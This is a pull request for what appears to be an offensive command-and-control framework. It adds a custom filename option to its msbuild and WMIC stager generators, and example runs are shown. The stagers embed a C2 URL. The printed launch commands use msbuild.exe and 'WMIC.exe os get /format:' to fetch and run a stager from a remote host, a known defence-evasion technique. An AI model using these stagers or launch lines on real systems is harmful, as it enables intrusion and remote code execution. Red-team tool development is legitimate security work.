### PR TITLE
Implementing filename for stager file

### DIFF
--- a/Server/stagers/msbuild.py
+++ b/Server/stagers/msbuild.py
@@ -8,8 +8,11 @@ class STStager:
         self.author = '@byt3bl33d3r'
         self.options = {}
 
-    def generate(self, listener):
-        with open('msbuild.xml', 'w') as stager:
+    def generate(self, listener, filename=None):
+        stager_filename = 'msbuild.xml'
+        if filename is not None:
+            stager_filename = filename
+        with open(stager_filename, 'w') as stager:
             with open('stagers/templates/msbuild.xml') as template:
                 template = template.read()
                 template = template.replace('C2_URL', f"https://{listener['BindIP']}:{listener['Port']}")
@@ -17,4 +20,5 @@ class STStager:
                 stager.write(template)
 
                 print_good(f"Generated stager to {stager.name}")
-                print_info("Launch with 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe msbuild.xml'")
+                print_info(
+                    f"Launch with 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe {stager_filename}'")

--- a/Server/stagers/wmic.py
+++ b/Server/stagers/wmic.py
@@ -8,8 +8,11 @@ class STStager:
         self.author = '@byt3bl33d3r'
         self.options = {}
 
-    def generate(self, listener):
-        with open('wmic.xsl', 'w') as stager:
+    def generate(self, listener, filename=None):
+        stager_filename = 'wmic.xsl'
+        if filename is not None:
+            stager_filename = filename
+        with open(stager_filename, 'w') as stager:
             with open('stagers/templates/wmic.xsl') as template:
                 template = template.read()
                 template = template.replace('C2_URL', f"https://{listener['BindIP']}:{listener['Port']}")
@@ -18,5 +21,5 @@ class STStager:
 
                 print_good(f"Generated stager to {stager.name}")
                 print_info("Launch with:")
-                print('\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:"https://myurl/wmic.xsl"')
-                print('\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:"wmic.xsl"')
+                print(f"\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:\"https://myurl/{stager_filename}\"")
+                print(f"\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:\"{stager_filename}\"")

--- a/Server/stvenom.py
+++ b/Server/stvenom.py
@@ -92,6 +92,12 @@ if __name__ == "__main__":
 
     stager = validate_stager(args.stager)
 
+    stager_file = None
+    resource_file = stager.name
+    if args.file is not None:
+        resource_file = args.file
+        stager_file = args.file
+
     if stager is None:
         print_bad("ERROR: Invalid stager.")
         sys.exit(1)
@@ -103,12 +109,8 @@ if __name__ == "__main__":
         print_bad("ERROR: Invalid listener.")
         sys.exit(1)
 
-    stager.generate(listener)
+    stager.generate(listener, stager_file)
 
-    filename = stager.name
-    if args.file is not None:
-        filename = args.file
-
-    generate_resource_file(filename, listener)
+    generate_resource_file(resource_file, listener)
 
     sys.exit(0)


### PR DESCRIPTION
```
$ python stvenom.py wmic http 8090 --file testing.xls
[+] Generated stager to testing.xls
[*] Launch with:
        C:\Windows\System32\wbem\WMIC.exe os get /format:"https://myurl/testing.xls"
        C:\Windows\System32\wbem\WMIC.exe os get /format:"testing.xls"
[+] Generated resource file: testing.xls.res
```

```
$ python stvenom.py msbuild http 8090 --file testing.xml
[+] Generated stager to testing.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe testing.xml'
[+] Generated resource file: testing.xml.res
```